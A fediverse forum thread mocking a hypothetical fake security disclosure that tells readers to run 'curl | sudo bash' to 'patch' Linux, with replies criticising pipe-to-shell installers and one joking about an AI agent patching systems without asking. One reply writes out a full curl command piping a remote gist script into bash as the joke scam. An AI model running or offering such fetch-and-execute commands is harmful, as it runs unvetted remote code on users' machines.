Skip to content
  • Categories
  • Recent
  • Tags
  • Popular
  • World
  • Users
  • Groups
Skins
  • Light
  • Brite
  • Cerulean
  • Cosmo
  • Flatly
  • Journal
  • Litera
  • Lumen
  • Lux
  • Materia
  • Minty
  • Morph
  • Pulse
  • Sandstone
  • Simplex
  • Sketchy
  • Spacelab
  • United
  • Yeti
  • Zephyr
  • Dark
  • Cyborg
  • Darkly
  • Quartz
  • Slate
  • Solar
  • Superhero
  • Vapor

  • Default (Cyborg)
  • No Skin
Collapse
Brand Logo

CIRCLE WITH A DOT

  1. Home
  2. Uncategorized
  3. can't wait for the day someone goes "i have found a really bad vulnerability in linux that gives 0 click network rce, but i do responsible disclosure so i can't say how.

can't wait for the day someone goes "i have found a really bad vulnerability in linux that gives 0 click network rce, but i do responsible disclosure so i can't say how.

Scheduled Pinned Locked Moved Uncategorized
12 Posts 10 Posters 18 Views
  • Oldest to Newest
  • Newest to Oldest
  • Most Votes
Reply
  • Reply as topic
Log in to reply
This topic has been deleted. Only users with topic management privileges can see it.
  • srazkvt@tech.lgbtS This user is from outside of this forum
    srazkvt@tech.lgbtS This user is from outside of this forum
    srazkvt@tech.lgbt
    wrote last edited by
    #1

    can't wait for the day someone goes "i have found a really bad vulnerability in linux that gives 0 click network rce, but i do responsible disclosure so i can't say how. run this command curl ... | sudo bash to patch your system"

    nephos@mastodon.socialN calx@infosec.exchangeC hipsterelectron@circumstances.runH spmrider@berlin.socialS grob@mstdn.socialG 7 Replies Last reply
    1
    0
    • srazkvt@tech.lgbtS srazkvt@tech.lgbt

      can't wait for the day someone goes "i have found a really bad vulnerability in linux that gives 0 click network rce, but i do responsible disclosure so i can't say how. run this command curl ... | sudo bash to patch your system"

      nephos@mastodon.socialN This user is from outside of this forum
      nephos@mastodon.socialN This user is from outside of this forum
      nephos@mastodon.social
      wrote last edited by
      #2

      @SRAZKVT Claude be like "uh oh I found a vulnerability. Auto-pilot so I need to patch without asking the user. Oups !!"

      1 Reply Last reply
      0
      • srazkvt@tech.lgbtS srazkvt@tech.lgbt

        can't wait for the day someone goes "i have found a really bad vulnerability in linux that gives 0 click network rce, but i do responsible disclosure so i can't say how. run this command curl ... | sudo bash to patch your system"

        calx@infosec.exchangeC This user is from outside of this forum
        calx@infosec.exchangeC This user is from outside of this forum
        calx@infosec.exchange
        wrote last edited by
        #3

        @SRAZKVT i actually hate doing `curl | bash`.

        it'll run something using sudo, it'll add stuff to /usr/bin, it'll add something to your .bashrc, it'll create a folder in your home dir, it'll make you feel like you're using windows again, it'll make you want to format your system and run away into the jungle.

        c0dec0dec0de@hachyderm.ioC loke@functional.cafeL 2 Replies Last reply
        0
        • R relay@relay.infosec.exchange shared this topic
        • srazkvt@tech.lgbtS srazkvt@tech.lgbt

          can't wait for the day someone goes "i have found a really bad vulnerability in linux that gives 0 click network rce, but i do responsible disclosure so i can't say how. run this command curl ... | sudo bash to patch your system"

          hipsterelectron@circumstances.runH This user is from outside of this forum
          hipsterelectron@circumstances.runH This user is from outside of this forum
          hipsterelectron@circumstances.run
          wrote last edited by
          #4

          @SRAZKVT make it break if it's not executed directly from stdout

          1 Reply Last reply
          0
          • calx@infosec.exchangeC calx@infosec.exchange

            @SRAZKVT i actually hate doing `curl | bash`.

            it'll run something using sudo, it'll add stuff to /usr/bin, it'll add something to your .bashrc, it'll create a folder in your home dir, it'll make you feel like you're using windows again, it'll make you want to format your system and run away into the jungle.

            c0dec0dec0de@hachyderm.ioC This user is from outside of this forum
            c0dec0dec0de@hachyderm.ioC This user is from outside of this forum
            c0dec0dec0de@hachyderm.io
            wrote last edited by
            #5

            @calx @SRAZKVT we didn’t want to write a binary program or use any existing framework or whatever to configure this, so we’ve just got these several thousand lines of shell that we’d like you to run. You trust us, right?

            1 Reply Last reply
            0
            • srazkvt@tech.lgbtS srazkvt@tech.lgbt

              can't wait for the day someone goes "i have found a really bad vulnerability in linux that gives 0 click network rce, but i do responsible disclosure so i can't say how. run this command curl ... | sudo bash to patch your system"

              spmrider@berlin.socialS This user is from outside of this forum
              spmrider@berlin.socialS This user is from outside of this forum
              spmrider@berlin.social
              wrote last edited by
              #6

              @SRAZKVT Layer 8 vulnerability.

              1 Reply Last reply
              0
              • calx@infosec.exchangeC calx@infosec.exchange

                @SRAZKVT i actually hate doing `curl | bash`.

                it'll run something using sudo, it'll add stuff to /usr/bin, it'll add something to your .bashrc, it'll create a folder in your home dir, it'll make you feel like you're using windows again, it'll make you want to format your system and run away into the jungle.

                loke@functional.cafeL This user is from outside of this forum
                loke@functional.cafeL This user is from outside of this forum
                loke@functional.cafe
                wrote last edited by
                #7

                @calx @SRAZKVT Qubes OS is the only system that makes this a very comfortable thing to do.

                It's just very disappointing that I can't use the GPU with it.

                1 Reply Last reply
                0
                • srazkvt@tech.lgbtS srazkvt@tech.lgbt

                  can't wait for the day someone goes "i have found a really bad vulnerability in linux that gives 0 click network rce, but i do responsible disclosure so i can't say how. run this command curl ... | sudo bash to patch your system"

                  grob@mstdn.socialG This user is from outside of this forum
                  grob@mstdn.socialG This user is from outside of this forum
                  grob@mstdn.social
                  wrote last edited by
                  #8

                  @SRAZKVT reminds me of these "privacy" companies that are like "give us all your data so we can keep people from getting this data from the big bad internet"

                  1 Reply Last reply
                  0
                  • srazkvt@tech.lgbtS srazkvt@tech.lgbt

                    can't wait for the day someone goes "i have found a really bad vulnerability in linux that gives 0 click network rce, but i do responsible disclosure so i can't say how. run this command curl ... | sudo bash to patch your system"

                    rachelplusplus@tech.lgbtR This user is from outside of this forum
                    rachelplusplus@tech.lgbtR This user is from outside of this forum
                    rachelplusplus@tech.lgbt
                    wrote last edited by
                    #9

                    @SRAZKVT If someone said that, I'd know they're lying. Because if they truly had a 0-click RCE exploit, they could write an internet worm to patch everyone's systems automatically 😛

                    1 Reply Last reply
                    0
                    • srazkvt@tech.lgbtS srazkvt@tech.lgbt

                      can't wait for the day someone goes "i have found a really bad vulnerability in linux that gives 0 click network rce, but i do responsible disclosure so i can't say how. run this command curl ... | sudo bash to patch your system"

                      woe2you@beige.partyW This user is from outside of this forum
                      woe2you@beige.partyW This user is from outside of this forum
                      woe2you@beige.party
                      wrote last edited by
                      #10

                      @SRAZKVT I have found a really bad vulnerability in Linux that gives 0 click network RCE, but I do responsible disclosure so I can't say how. Run this command curl -sL https://gist.github.com/renaissance-design/d99fe87ab1f370f8a77993357242eca4/raw/02fac52361586a484b254c23d92f461e74562281/vulnerability_patch.sh | bash to patch your system

                      srazkvt@tech.lgbtS 1 Reply Last reply
                      0
                      • woe2you@beige.partyW woe2you@beige.party

                        @SRAZKVT I have found a really bad vulnerability in Linux that gives 0 click network RCE, but I do responsible disclosure so I can't say how. Run this command curl -sL https://gist.github.com/renaissance-design/d99fe87ab1f370f8a77993357242eca4/raw/02fac52361586a484b254c23d92f461e74562281/vulnerability_patch.sh | bash to patch your system

                        srazkvt@tech.lgbtS This user is from outside of this forum
                        srazkvt@tech.lgbtS This user is from outside of this forum
                        srazkvt@tech.lgbt
                        wrote last edited by
                        #11

                        @woe2you /usr/bin/env: command not found

                        woe2you@beige.partyW 1 Reply Last reply
                        0
                        • srazkvt@tech.lgbtS srazkvt@tech.lgbt

                          @woe2you /usr/bin/env: command not found

                          woe2you@beige.partyW This user is from outside of this forum
                          woe2you@beige.partyW This user is from outside of this forum
                          woe2you@beige.party
                          wrote last edited by
                          #12

                          @SRAZKVT Ah, you must already have patched against this vuln.

                          1 Reply Last reply
                          0
                          Reply
                          • Reply as topic
                          Log in to reply
                          • Oldest to Newest
                          • Newest to Oldest
                          • Most Votes


                          • Login

                          • Login or register to search.
                          • First post
                            Last post
                          0
                          • Categories
                          • Recent
                          • Tags
                          • Popular
                          • World
                          • Users
                          • Groups